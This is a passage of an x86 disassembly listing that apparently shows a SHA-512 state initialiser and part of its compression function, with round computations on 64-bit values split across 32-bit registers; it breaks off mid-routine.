; =============== S U B R O U T I N E =======================================
sub_4143A0 proc near ; CODE XREF: sub_41B7F9+64�p
xor ecx, ecx
push esi
push edi
mov [eax+8], ecx
mov [eax+0Ch], ecx
mov [eax], ecx
mov [eax+4], ecx
lea edi, [eax+10h]
mov ecx, 10h
mov esi, offset dword_41FE50
rep movsd
pop edi
pop esi
retn
sub_4143A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4143D0 proc near ; CODE XREF: sub_416AE0+BE�p
; sub_416AE0+13B�p ...
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 160h
mov eax, [esp+160h+arg_0]
mov edx, [eax+54h]
push ebx
mov [esp+164h+var_FC], edx
mov edx, [eax+5Ch]
push ebp
push esi
mov [esp+16Ch+var_10C], edx
mov edx, [eax+64h]
push edi
lea esi, [eax+10h]
mov [esp+170h+var_4], esi
mov ecx, 10h
lea edi, [esp+170h+var_158]
rep movsd
mov ecx, [eax+50h]
mov [esp+170h+var_100], ecx
mov ecx, [eax+58h]
mov [esp+170h+var_110], ecx
mov ecx, [eax+60h]
mov [esp+170h+var_108], ecx
mov ecx, [eax+68h]
mov [esp+170h+var_104], edx
mov edx, [eax+6Ch]
mov [esp+170h+var_B8], ecx
mov ecx, [eax+70h]
mov [esp+170h+var_B4], edx
mov edx, [eax+74h]
mov [esp+170h+var_A8], ecx
mov ecx, [eax+78h]
mov [esp+170h+var_A4], edx
mov edx, [eax+7Ch]
mov [esp+170h+var_D0], ecx
mov ecx, [eax+80h]
mov [esp+170h+var_CC], edx
mov edx, [eax+84h]
mov esi, [eax+0C4h]
mov [esp+170h+var_D8], ecx
mov ecx, [eax+88h]
mov [esp+170h+var_D4], edx
mov edx, [eax+8Ch]
mov [esp+170h+var_118], ecx
mov ecx, [eax+90h]
mov [esp+170h+var_114], edx
mov edx, [eax+94h]
mov [esp+170h+var_C8], ecx
mov ecx, [eax+98h]
mov [esp+170h+var_C4], edx
mov edx, [eax+9Ch]
mov [esp+170h+var_F0], ecx
mov ecx, [eax+0A0h]
mov [esp+170h+var_EC], edx
mov edx, [eax+0A4h]
mov [esp+170h+var_E8], ecx
mov ecx, [eax+0A8h]
mov [esp+170h+var_E4], edx
mov edx, [eax+0ACh]
mov [esp+170h+var_F8], ecx
mov ecx, [eax+0B0h]
mov [esp+170h+var_F4], edx
mov edx, [eax+0B4h]
mov [esp+170h+var_B0], ecx
mov ecx, [eax+0B8h]
mov [esp+170h+var_AC], edx
mov edx, [eax+0BCh]
mov [esp+170h+var_C0], ecx
mov ecx, [eax+0C0h]
mov [esp+170h+var_BC], edx
mov edx, [eax+0C8h]
mov eax, [eax+0CCh]
xor edi, edi
mov [esp+170h+var_15C], edi
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_9C], esi
mov [esp+170h+var_E0], edx
mov [esp+170h+var_DC], eax
jmp short loc_41456E
; ---------------------------------------------------------------------------
align 10h
loc_414560: ; CODE XREF: sub_4143D0+2680�j
mov ecx, [esp+170h+var_A0]
mov esi, [esp+170h+var_9C]
loc_41456E: ; CODE XREF: sub_4143D0+18A�j
test edi, edi
mov eax, [esp+170h+var_138]
mov edx, [esp+170h+var_134]
jz loc_414658
mov edi, ecx
xor eax, eax
mov ebx, esi
shrd edi, ebx, 13h
or eax, edi
mov ebp, ecx
mov edx, ecx
mov edi, esi
shld esi, ebp, 3
shr ebx, 13h
shl edx, 0Dh
or edx, ebx
add ebp, ebp
xor ebx, ebx
or ebx, esi
mov esi, [esp+170h+var_9C]
shrd ecx, esi, 6
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor eax, edi
xor eax, ecx
mov ecx, [esp+170h+var_10C]
xor edx, ebx
mov [esp+170h+var_160], eax
mov eax, [esp+170h+var_110]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
shr esi, 6
xor edx, esi
xor edi, edi
or edi, ebx
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_10C]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_110]
shrd ecx, eax, 7
shr eax, 7
xor edi, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+arg_0]
xor edi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+50h], ecx
mov [eax+54h], edx
mov eax, edx
mov edx, [esp+170h+var_134]
mov [esp+170h+var_FC], eax
mov [esp+170h+var_54], eax
mov eax, [esp+170h+var_138]
mov [esp+170h+var_100], ecx
mov [esp+170h+var_58], ecx
jmp short loc_41466E
; ---------------------------------------------------------------------------
loc_414658: ; CODE XREF: sub_4143D0+1A8�j
mov ecx, [esp+170h+var_100]
mov [esp+170h+var_58], ecx
mov ecx, [esp+170h+var_FC]
mov [esp+170h+var_54], ecx
loc_41466E: ; CODE XREF: sub_4143D0+286�j
mov ebx, edx
mov esi, edx
xor edi, edi
mov ecx, eax
shld ebx, ecx, 17h
or edi, ebx
shl ecx, 17h
xor ebx, ebx
shr esi, 9
or esi, ecx
mov ebp, eax
shrd ebp, edx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor esi, ebx
shr edx, 12h
mov ecx, eax
shl ecx, 0Eh
or ecx, edx
xor edi, ecx
xor ecx, ecx
mov ebx, eax
shrd ebx, ebp, 0Eh
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_134]
shr ebp, 0Eh
mov edx, eax
shl edx, 12h
or edx, ebp
mov ebp, [esp+170h+var_130]
xor edi, edx
and ebp, eax
mov edx, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not edx
and edx, [esp+170h+var_128]
not ebx
and ebx, [esp+170h+var_124]
xor edx, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add esi, edx
adc edi, ebx
add esi, ds:dword_41F950[eax*8]
adc edi, ds:dword_41F954[eax*8]
add esi, [esp+170h+var_58]
mov eax, [esp+170h+var_120]
adc edi, [esp+170h+var_54]
add eax, esi
adc ecx, edi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov eax, [esp+170h+var_154]
mov ecx, [esp+170h+var_158]
mov edx, ecx
mov esi, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
mov ecx, eax
xor edi, edx
xor esi, ebx
shr ecx, 7
mov ebx, [esp+170h+var_158]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
or ecx, ebx
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_14C]
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_158]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
and ecx, edx
mov edx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and edx, eax
xor ebx, ecx
xor ebp, edx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_414884
mov eax, [esp+170h+var_E0]
mov ecx, [esp+170h+var_DC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_108]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+58h], ecx
mov [eax+5Ch], edx
mov eax, edx
mov [esp+170h+var_110], ecx
mov [esp+170h+var_10C], eax
mov [esp+170h+var_28], ecx
jmp short loc_414893
; ---------------------------------------------------------------------------
loc_414884: ; CODE XREF: sub_4143D0+3D5�j
mov edx, [esp+170h+var_110]
mov eax, [esp+170h+var_10C]
mov [esp+170h+var_28], edx
loc_414893: ; CODE XREF: sub_4143D0+4B2�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_24], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F958[eax*8]
adc esi, ds:dword_41F95C[eax*8]
add edx, [esp+170h+var_28]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_24]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_414AAE
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_100]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
mov [eax+60h], ecx
mov [eax+64h], edx
mov eax, edx
mov [esp+170h+var_108], ecx
mov [esp+170h+var_104], eax
mov [esp+170h+var_70], ecx
jmp short loc_414ABD
; ---------------------------------------------------------------------------
loc_414AAE: ; CODE XREF: sub_4143D0+605�j
mov edx, [esp+170h+var_108]
mov eax, [esp+170h+var_104]
mov [esp+170h+var_70], edx
loc_414ABD: ; CODE XREF: sub_4143D0+6DC�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_6C], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F960[eax*8]
adc esi, ds:dword_41F964[eax*8]
add edx, [esp+170h+var_70]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_6C]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_414CEA
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_110]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_10C]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_110]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_10C]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
mov [eax+68h], ecx
mov [eax+6Ch], edx
mov eax, edx
mov [esp+170h+var_B8], ecx
mov [esp+170h+var_B4], eax
mov [esp+170h+var_38], ecx
jmp short loc_414CFF
; ---------------------------------------------------------------------------
loc_414CEA: ; CODE XREF: sub_4143D0+82F�j
mov edx, [esp+170h+var_B8]
mov eax, [esp+170h+var_B4]
mov [esp+170h+var_38], edx
loc_414CFF: ; CODE XREF: sub_4143D0+918�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_34], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F968[eax*8]
adc esi, ds:dword_41F96C[eax*8]
add edx, [esp+170h+var_38]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_34]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_414F30
mov eax, [esp+170h+var_D0]
mov ecx, [esp+170h+var_CC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_108]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
mov [eax+70h], ecx
mov [eax+74h], edx
mov eax, edx
mov [esp+170h+var_A8], ecx
mov [esp+170h+var_A4], eax
mov [esp+170h+var_88], ecx
jmp short loc_414F45
; ---------------------------------------------------------------------------
loc_414F30: ; CODE XREF: sub_4143D0+A75�j
mov edx, [esp+170h+var_A8]
mov eax, [esp+170h+var_A4]
mov [esp+170h+var_88], edx
loc_414F45: ; CODE XREF: sub_4143D0+B5E�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_84], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F970[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F974[eax*8]
add edx, [esp+170h+var_88]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_84]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_4151B2
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_D8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_D4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_D8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+78h], ecx
mov [eax+7Ch], edx
mov eax, edx
mov [esp+170h+var_D0], ecx
mov [esp+170h+var_CC], eax
mov [esp+170h+var_60], ecx
jmp short loc_4151C7
; ---------------------------------------------------------------------------
loc_4151B2: ; CODE XREF: sub_4143D0+CEB�j
mov edx, [esp+170h+var_D0]
mov eax, [esp+170h+var_CC]
